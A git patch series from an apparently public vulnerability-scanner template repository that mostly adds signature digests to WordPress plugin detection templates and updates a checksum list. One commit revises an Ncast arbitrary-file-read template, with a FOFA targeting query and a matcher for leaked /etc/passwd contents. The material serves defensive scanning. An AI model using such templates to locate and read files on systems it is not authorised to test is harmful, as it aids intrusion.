4a0a0047304502201cf1890d14fbba1fea090c686f8b0e7cfb9c8c32ca7baa4f43fca5e7d9d532ef022100e639ffdc5c3273acb6d7191929d035d6862a8712b6ee29b3e7c6c6c3adc94b6f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 108aba79e9..afc66784f8 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100dddaf54256416bf252d429f4e6084d9bd1b461a2d4989763497eb21a49bae5ba022100a98c3d2336a52e47652042c838d155967c7f4f62dd26ee233f4b79ef48a599b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index f6f6bf5566..d742b8abba 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c05e60a208225adbc845b5d6ed9a44b4cfb7452c7631ed8a62ccc8b84f3500d6022100c7f8749f314d7d2821ab447beecdeaa8876fcf3a952e83e5aa24e36c17cdfb99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 483cb7cac7..4561cdd154 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c12405c1d075a1637dccc3794755d2987897688771db4530db51b9a9652673e1022100af68be9cb83fc95c0a229c6c75ce0ed777c9a4228666ff9d60cdc17b9e626863:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index a132c98df4..fbdd300447 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207a8326d142a0f498238424595b10ead87f3c747a07d4a42d307a5efe21de471c02200ccb8d67d081a5ff620885bdb16974bf8da25bdd95e6af3ed52b0d859e225040:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 135bbee046..5dbe2fb32c 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201131c2f94951df8286bb3401fe404c9f509550d23c98d513f15f237d2344edd602205b94a96428eec4b6fe4baa22d7a332d476ba3dfcc59f97c16f86e5c2fc947560:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 5b690d96c0..24c636823f 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b0b02a86bc93876f19852589bd05a4bd31e8c4998e706e547803b89fca3d413902205a180c9bb5b91bdffd1d7dd77d0f0bdee2c2e53033a2eec4ef856eac0a74fa19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 16c7d6cff5..0a75000040 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009d28a576ead0122b3a1c39e70a075d8ba86ea53f5a26f8ff10cd37fb3e35acec022100dc6328995a5cde53ace0af6c8ce9e6c5830e9410c6b367d87ff99cf972a30d9e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index ab099f357e..d1cb6275d9 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022022a652e67be791ec02ed035c833079b7a001b4045857cbf1f74c1bf21cb500170221008af74cbe1209863b1ccebdd8eab06a799d110f73c403eaa15315543acb80f2e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index ad0b8f8fed..b782d319bb 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220589f411b35afa536a44e36bee7477c2272cbf5ed105d38bcc46b1676646207b202210091c87e96db77cd96f63fa25cc8c5807e648867ca8e875ab069250324579b604c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index aaaf0f9a17..0b190874a6 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205bc31c26325c64db4caadece16251729904ad01936b19147c1a4d69e13f0c960022015eef5f155e11c85b8a6486a6fa0f33b936a39642dd3576bee7e25cbdd7ca988:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index f943c7afeb..923a71087b 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205ab7d7ce1cfbf2a5e4d8803e7d18634bcee35e3c7770f404eb37a1c070db99fd022032538f568a7dbc6e249049beef2398d744502e206f7b9da6d2a699b34be9b8ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 062e5c85b4..1840010670 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220343e3a19dc1b7271e59dd816b0c4e8dab9f7e62f026491db19e1a7b189497efe022060a91c34f8402cfe77b8f5698354dcbc7be988ecf2d1b301dbfa79c8177d763f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 6dcfdda117..5f0c127fa0 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201657f853008b67c294360756034e19fba9a098779fefe2f5f4c20930145601ee0220701da9a8b3bd19e7110fa5a8a78c1e62905d06f26ec13ea90c217baaf5b2d81d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 117970f7a9d046334d1fe6e96475225cba24957b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 21 Jul 2024 13:58:28 +0530 Subject: [PATCH 1473/1841] minor-update --- http/vulnerabilities/other/ncast-lfi.yaml | 12 ++++++++++-- 1 file changed, 10 insertions(+), 2 deletions(-) diff --git a/http/vulnerabilities/other/ncast-lfi.yaml b/http/vulnerabilities/other/ncast-lfi.yaml index 2c9a9cc8da..e63299e670 100644 --- a/http/vulnerabilities/other/ncast-lfi.yaml +++ b/http/vulnerabilities/other/ncast-lfi.yaml @@ -1,7 +1,7 @@ id: ncast-lfi info: - name: Ncast HD Intelligent - LFI + name: Ncast HD Intelligent Recording - Arbitrary File Reading author: pussycat0x severity: high description: | @@ -10,7 +10,9 @@ info: - https://github.com/wy876/POC/blob/main/Ncast%E9%AB%98%E6%B8%85%E6%99%BA%E8%83%BD%E5%BD%95%E6%92%AD%E7%B3%BB%E7%BB%9F%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md metadata: fofa-query: app="Ncast-产品" && title=="高清智能录播系统" - tags: ncast,lfi,misconfig + verified: true + max-request: 1 + tags: ncast,lfi http: - method: GET @@ -20,9 +22,15 @@ http: matchers-condition: and matchers: - type: regex + part: body regex: - "root:.*:0:0:" + - type: word + part: content_type + words: + - "application/force-download" + - type: status status: - 200 From fb554d5af16e0a662808c40d0ffd849c0b158ca8 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 21 Jul 2024 08:30:59 +0000 Subject: [PATCH 1475/1841] Auto Generated Templates Checksum [Sun Jul 21 08:30:59 UTC 2024] :robot: --- templates-checksum.txt | 406 ++++++++++++++++++++--------------------- 1 file changed, 203 insertions(+), 203 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 8073092849..b4c5c47562 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -993,7 +993,7 @@ http/cnvd/2022/CNVD-2022-86535.yaml:00d1bf41def187f5b792344c1393ae436a839513 http/cnvd/2023/CNVD-2023-03903.yaml:45257042fc1f34bbce82e67a75121333bad5d6c1 http/cnvd/2023/CNVD-2023-08743.yaml:8c2c0d1a7f369a2570b604f2aa5820f2de976388 http/cnvd/2023/CNVD-2023-12632.yaml:20d2c023ba88ea69568ea70c9619a6f229c9a929 -http/cnvd/2023/CNVD-2023-72138.yaml:4c1e948ea4fa898cb216f0fd2caa0f7cef9cee3b +http/cnvd/2023/CNVD-2023-72138.yaml:5025fd0f45c4d4a5e11a1ce8bd01ef28aa479de9 http/cnvd/2023/CNVD-2023-96945.yaml:af381634d92b6ad37814da12d2f652c60614fe75 http/cnvd/2023/CNVD-C-2023-76801.yaml:7a741a8fbfcf92c4df98e64eada67899895d8078 http/cnvd/2024/CNVD-2024-15077.yaml:d97b1860e5154481146b5ebaf48f57448f62ecd1 @@ -5041,7 +5041,7 @@ http/exposures/files/desktop-ini-exposure.yaml:e1f2848de5e29a1d1f0069c15a5451d38 http/exposures/files/django-secret-key.yaml:9a9152c6627c7d1bb85923caedf61303f26e78b9 http/exposures/files/docker-cloud.yaml:1cd831e6d009b49e120b14206b7a19b825fd5272 http/exposures/files/domcfg-page.yaml:28b2f74eed60f6bf047db658ffcf8ccbacfb90a4 -http/exposures/files/ds-store-file.yaml:0695229ae660cfc1cddec38c9dda770066acd705 +http/exposures/files/ds-store-file.yaml:a1cc289907a19785a7325f0fd21c01a9bc6821a0 http/exposures/files/dwsync-exposure.yaml:811dc04f9ef973b6d48e8b007590508b61230b4b http/exposures/files/environment-rb.yaml:cfd936dc5174ec7eee345830477ad8ee013d5eb4 http/exposures/files/exposed-alps-spring.yaml:0bc7763901ec79b827388db7d80f1c2838d73f1e @@ -7306,229 +7306,229 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96e80a750f1d703 -http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142 +http/technologies/wordpress/plugins/ad-inserter.yaml:0856efef2598cea5d63c24e0da1c00a7dcc257db +http/technologies/wordpress/plugins/add-to-any.yaml:fbfa348253efcce01f62b663b1540d2afa6cf33a +http/technologies/wordpress/plugins/admin-menu-editor.yaml:f25d15e68b4e1f9d7cbbc5fce86ea936360332ca http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:44a3c2e8c28b0a7c380fff8b194f80bc0b85209d -http/technologies/wordpress/plugins/akismet.yaml:a7c535fa20e8248b7d4b8c3dcd004f82ce282861 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:0e51e8a3f854d361a81dd965a25e30015a69c253 +http/technologies/wordpress/plugins/akismet.yaml:c1d0b8b65a0738fcd20dc5f6e50553cbb6f8abc8 http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e2f1f49e2fdfb1a7afcdf39851e892df5445bcc1 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4147669572a756fa71f8386e52115124747b3375 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0e58d08bff14a5bdcf74b0071ab30493843b7897 -http/technologies/wordpress/plugins/amp.yaml:59ccd6bfaedca34352633d519865cb5daf5cb295 -http/technologies/wordpress/plugins/antispam-bee.yaml:83282137b06b9d2725b87a1cc5a252e150a7289c -http/technologies/wordpress/plugins/astra-sites.yaml:16090e25b8fe43606f16c162171f7bfca5904f3e +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:9cc76c4fdbf80948340fca87f76589131c08b945 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:1ef425cdd4999ef46c456cad27caf591979c057f +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:daeef210b50158c2224d4731f84539ea3fcf1de3 +http/technologies/wordpress/plugins/amp.yaml:3f99b08116044c1fc047fb4a7ff30c2556a4c070 +http/technologies/wordpress/plugins/antispam-bee.yaml:8618198fc3ffec08696ef2c1b299d8837b0105c3 +http/technologies/wordpress/plugins/astra-sites.yaml:152cebb4011d620c650904d9f2cfc25a13e24a31 http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:7d1bf01c79ad1ccc3f93ae7ca50dd1dc848a8a50 -http/technologies/wordpress/plugins/backwpup.yaml:37a7481e252cd63ce9470fe090c12238683edc30 -http/technologies/wordpress/plugins/better-search-replace.yaml:f5ba1713c0d0c57feff23cd61f09adff485c1719 -http/technologies/wordpress/plugins/better-wp-security.yaml:b6b6b09969408686afbd99a8f501869efd3d9da7 -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9cde38ae78739088c0bd65304fb8d6531ef56533 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:34318fb63b04eba5f885e412e63eae18522719c2 -http/technologies/wordpress/plugins/breeze.yaml:e10adf37977d9912d3fbd5ccfd883eb279807d62 -http/technologies/wordpress/plugins/broken-link-checker.yaml:0213894e372f547ebaf10f75363f69db5f9ca1ba -http/technologies/wordpress/plugins/chaty.yaml:62cbf438b45f57052b4e03b5c0df71efdf66a6ff -http/technologies/wordpress/plugins/child-theme-configurator.yaml:5731175c0dfbe3a3df0e3a6e689be856fc69516d -http/technologies/wordpress/plugins/classic-editor.yaml:571df5057165afdd6c854028b0050a93a3a03d52 -http/technologies/wordpress/plugins/classic-widgets.yaml:0b4ade396e68a29fd134770790ea78081ab767a6 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:be13071cd6582b3cb210ad89c10fc6e0957bd131 +http/technologies/wordpress/plugins/autoptimize.yaml:cdb66388fb527e5ced9d8e6728ff9eff89a5e0b4 +http/technologies/wordpress/plugins/backwpup.yaml:676f3e146edb7486f9e87a948e1336c0314a3bf8 +http/technologies/wordpress/plugins/better-search-replace.yaml:58f777b64bc860aa9db448f7d58ba23893ae8986 +http/technologies/wordpress/plugins/better-wp-security.yaml:e2473bbe97314da5aed1132d1347adc47c5ee6b4 +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:4a59f1103678aebf98c279661ef539dbc568233a +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:cdfd040359b605fe6e40166fea4d52e6e1068155 +http/technologies/wordpress/plugins/breeze.yaml:f002be0282e9e182b0a5e39d4c674a15e22e47aa +http/technologies/wordpress/plugins/broken-link-checker.yaml:989de8d19c4513e0b2a7997e858b110cfdcc2d64 +http/technologies/wordpress/plugins/chaty.yaml:c0c6b1cd8a370742851dd65cbff0c3a5e73e91e0 +http/technologies/wordpress/plugins/child-theme-configurator.yaml:e42d969fd4d45135a6a7b09cd2787097895a2638 +http/technologies/wordpress/plugins/classic-editor.yaml:f0814109c8200d2c61fd785ab7f19ae255bf47a6 +http/technologies/wordpress/plugins/classic-widgets.yaml:35cd2b1bf07b5d089ad1c6e4870672a6cbd843a2 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:c30daefcfc1abf678c0ed64b114fe7319f30c64e http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:b1e8cafb11ee15d77391e1a02392af8cccba57f8 -http/technologies/wordpress/plugins/coblocks.yaml:a34822c69420495a9273affddf9194537282a30d -http/technologies/wordpress/plugins/code-snippets.yaml:678b681cd40897764ec166dea99de8478181954c -http/technologies/wordpress/plugins/coming-soon.yaml:0f3ded7600e1fa0bd83eb57744dfd945ba58dd73 -http/technologies/wordpress/plugins/complianz-gdpr.yaml:74b77fc63e2878a7d4f92f3a4b7f55c7e968ef6b -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:b7d102f65a73bdd3b009e0a7ad81e447d3eaa88d -http/technologies/wordpress/plugins/contact-form-7.yaml:140ba02fcbd12efc5d09525f322fb443d6b2ad57 -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:ab0ad7bfdd3ea91630c85b581daab66df5554c48 -http/technologies/wordpress/plugins/cookie-law-info.yaml:a7af47d278ad5eb7224c350eb2246c432e3288d3 -http/technologies/wordpress/plugins/cookie-notice.yaml:de50919a6a468a9878240d88e8ddf4f9d52fb176 -http/technologies/wordpress/plugins/copy-delete-posts.yaml:0e850184e814cce643bbf4ad50036499a316ef5b -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:5d6aa81f5fd085008d3137a640ae215211b4c0c2 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:096ba6d050e5a6419cff50741d7f3e5907d9bf75 -http/technologies/wordpress/plugins/custom-css-js.yaml:4459e4d2fcf25c6b65ccf035c24fa8777c48f08c -http/technologies/wordpress/plugins/custom-fonts.yaml:08c475c2849a90c08b82b758cfe5b9aee0cd711d -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:edc7a821b6fe5b015138a01d2ebc3e6513f491f9 -http/technologies/wordpress/plugins/disable-comments.yaml:8c1ccb3aa597c3bf0c16e84bf79a6f136b13fe3c -http/technologies/wordpress/plugins/disable-gutenberg.yaml:c5f1d33397f74e2566cccfe9adf4149eb14b4a11 -http/technologies/wordpress/plugins/duplicate-page.yaml:6f972f4970eef86897f9b7aff1c0c74f6edf5f41 -http/technologies/wordpress/plugins/duplicate-post.yaml:c8b511a66ff43a45ffedd1b88a46d40e53a8005e -http/technologies/wordpress/plugins/duplicator.yaml:f6e89d5511f41ab8fead85b58a61d82176319d44 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:13b2156be104efcc96069f119cdc2c858b5aed3a +http/technologies/wordpress/plugins/cmb2.yaml:0b7e40bedb657e09ffbe8053ef52403bff89f521 +http/technologies/wordpress/plugins/coblocks.yaml:3b2ae6915e270dbe89c086c2a6c366ae4743b5a4 +http/technologies/wordpress/plugins/code-snippets.yaml:fa89b3b587bb0bd044e031b57e0722f45ecb540d +http/technologies/wordpress/plugins/coming-soon.yaml:52a1862e2466d7197100ee96a84050ff4b379560 +http/technologies/wordpress/plugins/complianz-gdpr.yaml:da9ae925a05095689541edf5ea809b8235c86485 +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:c0d909965d9601a37c90fb5b6bde186da8c494d4 +http/technologies/wordpress/plugins/contact-form-7.yaml:a0d636b5426008030b6eb6be9edd8ad2490a3c46 +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:a90807808101f96c70aa9c3b861d26d053ba135d +http/technologies/wordpress/plugins/cookie-law-info.yaml:8dba5c592bee8266333023ed098fcbda0cf9154f +http/technologies/wordpress/plugins/cookie-notice.yaml:6454e3866a0406fd47373ca22bbcb978645b5ec7 +http/technologies/wordpress/plugins/copy-delete-posts.yaml:31841f6631164782746109cebccea978e6564627 +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:a133dd359ca458ebef58acbbe9094eecc4e1d9b7 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:1d041cc2d6e6dca565a3ed02664a77a1c74c84f4 +http/technologies/wordpress/plugins/custom-css-js.yaml:9f2054cfc1872eb28c6b9b2555d84b48d30afbd2 +http/technologies/wordpress/plugins/custom-fonts.yaml:7bd3fd05cfd5856a47a2e6a2ad5ca0e01e8f0b59 +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:bb474b2b336d39a108b1e2803ffb2d4209bdfa1c +http/technologies/wordpress/plugins/disable-comments.yaml:42d28abfec4a38537eb701d87ca3c3bf0da1dead +http/technologies/wordpress/plugins/disable-gutenberg.yaml:0fabd4ef48ba1c67ef8b73b68576ff9217d888f5 +http/technologies/wordpress/plugins/duplicate-page.yaml:0111b6e5caa4466bcdf358d3213eaa1d5a311632 +http/technologies/wordpress/plugins/duplicate-post.yaml:e4dc9f85cb35641d8465564d3fa27798f12565ff +http/technologies/wordpress/plugins/duplicator.yaml:e685882e6c4220f9f9931d274f646ff0627dd1cb +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:46b763d3743930a30739e2509656d02687b6aa15 http/technologies/wordpress/plugins/easy-fancybox.yaml:91706438bedc39afdeaebdbf43a683bb583c8ec0 http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:dc7f8a66d655b230b9f86e7408371b657afec872 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:7a3c617033da4dea65448ac98079dca7ce9eced7 -http/technologies/wordpress/plugins/elementor.yaml:87e57bed454c1ffa8f1180c092768b884c01fe55 -http/technologies/wordpress/plugins/elementskit-lite.yaml:fd765eb94f1951124b42f0060fdbaf3e41f64f94 -http/technologies/wordpress/plugins/enable-media-replace.yaml:ab31d8de8202f5fe56342e37e2b97b620c04a18d -http/technologies/wordpress/plugins/envato-elements.yaml:1792b1bb18d8e3b75290c49e9481abd752625f7f -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:e955c0301c4d36e1ed0058ca20df5e90550ff64a -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:b0b23c965232eedb1605f21ed92cd3647f6f18d4 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:0d6fa673ecc67045a97cd1b27b6de09368e069bc -http/technologies/wordpress/plugins/fast-indexing-api.yaml:89229b48edbf5b17553d55e6b39521ac3c61abcb -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:05492b67a15c0842ad5d7f263974671b9c461f84 -http/technologies/wordpress/plugins/flamingo.yaml:bbad18399f4057fce68a1019cfb0c177f3f66ad4 -http/technologies/wordpress/plugins/fluentform.yaml:41bab87a01e0ce62341a024bd937104f1072b395 -http/technologies/wordpress/plugins/font-awesome.yaml:d61908d165c5e27d05672655e2a21614d82c7df7 -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:18bdbf5f4ab294b177f0bb0fe1591208b00ba16e -http/technologies/wordpress/plugins/formidable.yaml:fc76ea970f27659d0479ccde36ffea594b78ece7 -http/technologies/wordpress/plugins/forminator.yaml:0d0c8abfd5d9b766e1d1f9ea24639096df336219 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:06ed726b8d2b53d84fb0a0b1a5e7bee8ce776739 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:eabba7c66e27662066cddd955ed9548285a0a19b -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:b80b8b453286fb2052562066564133d1df4d4522 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:52e327176ffa0934107760389a7fa6c15d6cd736 -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:98982c9edf9970367b127390e0c459c8b542e7fa -http/technologies/wordpress/plugins/google-site-kit.yaml:61300b4bd7867c298807e347709d0f2084201aa6 -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:38b0d8740502247c857db2223f0d1a3bf68881b1 -http/technologies/wordpress/plugins/gtranslate.yaml:f2c1f59a6c40d7979e51aa224166e4fdae6d61d6 -http/technologies/wordpress/plugins/gutenberg.yaml:b87560081e190486ebe86901eabd5efecc742a51 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:7403aa1e1055a924ed8a53be33eb00c623f83442 +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:26fc31bf37f0da80bb4969e917aec6a52b5e867e +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:c39b85a5ebcf236113658d1ada833a021bf575e6 +http/technologies/wordpress/plugins/elementor.yaml:31c82ed8efa9b7ad304b5f9aaaf1637c72319e47 +http/technologies/wordpress/plugins/elementskit-lite.yaml:09dd48d6909a6fff4fda4d93bcae8cd244d6bfd9 +http/technologies/wordpress/plugins/enable-media-replace.yaml:9db0cd820399c3c4c327b49a9528a35c7d4ccc60 +http/technologies/wordpress/plugins/envato-elements.yaml:18efde9dc5aa10045102f41ba08c6004cefab972 +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:84294ba5cb546b59cf3e19ba75f4889aee274ad4 +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:db05d3357b89603e3f10384fd8eefdab8e6cb077 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:3c3e1c79a029bd084f33fffae964563881769d11 +http/technologies/wordpress/plugins/fast-indexing-api.yaml:eeeed819cba20622753c8ae61171dbd95a9ba57a +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:2487d66404ec9f55f37da741750c55a6e2c146b7 +http/technologies/wordpress/plugins/flamingo.yaml:b23f9d9ce775edc4d4e54b47e93cb8dd1425b718 +http/technologies/wordpress/plugins/fluentform.yaml:fb4847ea7071a8e250dd880caf85bd1c0a967b79 +http/technologies/wordpress/plugins/font-awesome.yaml:9f4eca367af464c050798f8527ef0d58bb5692d4 +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:63b03a41ff6e5050fe882107002c8e3fb19edcd7 +http/technologies/wordpress/plugins/formidable.yaml:f30facfea24779cceb492efd3eb0eb988a0ef9d6 +http/technologies/wordpress/plugins/forminator.yaml:e20a2c6102007f347e66cdbe1210e1a56f3d4ecf +http/technologies/wordpress/plugins/ga-google-analytics.yaml:3bb1dec4d54556ea6d4515c51470261c5ee8dbbb +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:1d6eac1e825c190ee5e1aa5d62141dad5403feee +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:492217c9c744aeb35652d5343bfadc1afb12c230 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:5ee3272a2d12c6b6a17973113eee46d1abdce9cd +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:a2a9d74f6679ad1e6c11559477cc63d2537a9066 +http/technologies/wordpress/plugins/google-site-kit.yaml:e7f32b648664124b124715f792032a52f5088334 +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:bf5805c3830e82cb0c960b40cc4eae1e956fb3bf +http/technologies/wordpress/plugins/gtranslate.yaml:ad99c7997852da89869b362fa1dd95d69f96ce0d +http/technologies/wordpress/plugins/gutenberg.yaml:04484808aeeb473fbc5023ff2afc9be5f9408d03 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:efc1b4c6edaeb1933bca1a1401b4de7362443a01 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1d20308687bcbd54bf13c6f4ed88aa5d5707b8e4 